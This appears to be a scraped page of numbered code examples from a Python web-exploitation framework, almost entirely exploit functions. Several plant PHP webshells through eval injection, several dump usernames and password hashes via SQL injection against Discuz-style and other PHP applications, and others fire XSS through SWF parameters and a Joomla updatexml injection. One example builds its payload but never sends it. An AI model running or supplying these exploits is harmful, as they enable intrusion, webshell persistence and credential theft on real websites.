Ejemplo n.º 1
0
def exploit(options):
    url = options['target']['current_value']
    url = url + "/index.php/module/aciton/param1/${@phpinfo()}"
    logger.process("Requesting target site")
    response = http.get(url)
    if "<title>phpinfo()</title>" in response.text:
        logger.success("Exploitable!")
        logger.success("Phpinfo: %s" % url)
        url = url.replace("@phpinfo()", "@print(eval($_POST[chu]))")
        logger.success("Webshell: %s" % url)
        return url
Ejemplo n.º 2
0
def exploit(options):
    logger.process("Requesting target site")
    # 获取设置的参数
    url = options["target"]["current_value"]
    try:
        result = verify(url)
        logger.success("Username: %s" % result[0])
        logger.success("password: %s" % result[1])
        return "%s: %s|%s" % (url, result[0], result[1])
    except:
        pass
Ejemplo n.º 3
0
def exploit(options):
    url = options['target']['current_value']
    url = url + "/static/image/common/flvplayer.swf?file=1.flv&" \
                "linkfromdisplay=true&link=javascript:alert(1);"
    logger.process("Requesting target site")
    response = http.get(url, 5)
    if hashlib.md5(response.content).hexdigest(
    ) == "7d675405ff7c94fa899784b7ccae68d3":
        logger.success("Exploitable!")
        logger.success(url)
        return url
Ejemplo n.º 4
0
def exploit(options):
    url = options['target']['current_value']
    url = url + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf" \
                "?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale" \
                "rt%281%29;//"
    logger.process("Requesting target site")
    response = http.get(url)
    if hashlib.md5(response.content).hexdigest(
    ) == "3a1c6cc728dddc258091a601f28a9c12":
        logger.success("Exploitable!")
        logger.success(url)
        return url
Ejemplo n.º 5
0
def exploit(options):
    # 设置URL
    url = options["target"]["current_value"] + payload

    logger.process("send request...")

    response = http.get(url)

    if valiator(response.text) == True:
        logger.success("exploit success, target site have xss vuln ! :)")
        return True
    else:
        logger.error("exploit fail, target site no xss ! :(")
        return False
Ejemplo n.º 6
0
def verify(url):
    logger.process("Requesting target site")
    data = {
        "gids[99]":
        "'",
        "gids[100][0]":
        ") and (select 1 from (select count(*"
        "),concat(version(),floor(rand(0)*2))"
        "x from information_schema.tables gro"
        "up by x)a)#"
    }
    response = http.post(url, data)
    if "MySQL Query Error" in response.text:
        logger.success("Exploitable!")
        return True
Ejemplo n.º 7
0
def verify(url):
    logger.process("Verify webshell...")

    url = url + '/data/config.inc.php'
    # 根据payload设置
    payload = 'c=phpinfo()'

    response = http.post(url, payload)

    if "phpinfo" in response.text:
        logger.success("Exploit success :)")
        return {'shell': url, 'passwd': 'c'}
    else:
        logger.error('Exploit fail :(')
        return False
Ejemplo n.º 8
0
def exploit(options):
    url = options['target']['current_value']
    logger.process("Requesting " + url)
    url = url + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \
                "%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \
                "password,0x68616e64736f6d65636875),5%20from%20et_users%23"
    header = {'Cookie': options['cookie']['current_value']}
    response = http.get(url, header, 5)
    if "handsomechu" in response.text:
        logger.success("Exploitable!")
        user = response.text.split("handsomechu")[1].split("~~~")
        username, password = user
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (url, username, password)
Ejemplo n.º 9
0
def exploit(options):
    url = options['target']['current_value']
    urls = [
        url + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
        url + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D"
    ]

    for i, url in zip(range(1, 3), urls):
        logger.process("Testing URL %d..." % i)
        response = http.get(url)
        if "<title>phpinfo()</title>" in response.text:
            logger.success("Exploitable!")
            logger.success("Phpinfo: %s" % url)
            url = url.replace("%24%7B%40phpinfo%28%29%7D",
                              "%24%7B%40eval(%24_POST%5B'chu'%5D)%7D")
            logger.success("WebShell: %s" % url)
            return url
Ejemplo n.º 10
0
def get_hash(url):
    logger.process("Getting manager's hash")
    data = {
        "gids[99]":
        "'",
        "gids[100][0]":
        ") and (select 1 from (select count(*"
        "),concat((select (select (select con"
        "cat(0x7e7e7e,username,0x7e,password,"
        "0x7e7e7e) from cdb_members limit 0,1"
        ") ) from `information_schema`.tables"
        " limit 0,1),floor(rand(0)*2))x from "
        "information_schema.tables group by x"
        ")a)#"
    }
    response = http.post(url, data)
    result = response.text.split("~~~")[1].split("~")
    return {"username": result[0], "md5": result[1]}
def exploit(options):
    url = options['target']['current_value']
    logger.process("Requesting " + url)
    url = url + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \
                "16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \
                "36f6d65636875)%20from%20et_users%20limit%201,1%23"
    # 设置cookie
    header = {'Cookie': options['cookie']['current_value']}

    response = http.get(url, header, 5)

    if "handsomechu" in response.text:
        logger.success("Exploitable!")
        user = response.text.split("handsomechu")[1].split("~~~")
        username, password = user
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (url, username, password)
Ejemplo n.º 12
0
def exploit(options):
    # 日志回显
    logger.process("set exploit params...")

    # 获取设置的参数
    url = options["target"]["current_value"]

    logger.process("send request...")
    # 设置header
    headers = {'xxoo':'1111111111111111'}
    # 请求
    response = http.get(url, headers, 1)

    if "success" in response:
        logger.success("exploit success ! :)")
        return True
    else:
        logger.error("exploit fail ! :(")
        return False
Ejemplo n.º 13
0
def exploit(options):
    # 日志回显
    logger.process("set exploit params...")

    # 获取设置的参数
    url = options["target"]["current_value"]

    payload = url + 'index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x5e,concat(1,(select md5(1))),1)'

    logger.process("send request...")

    # 请求
    response = http.get(url)

    flag = hashlib.md5(1)
    if flag.hexdigest() in response:
        logger.success("exploit success ! :)")
        return True
    else:
        logger.error("exploit fail ! :(")
        return False
Ejemplo n.º 14
0
 def do_exploit(self, line):
     if not self.current_exploit:
         return
     else:
         logger.process("Exloit init...")
         return self.run_exploit()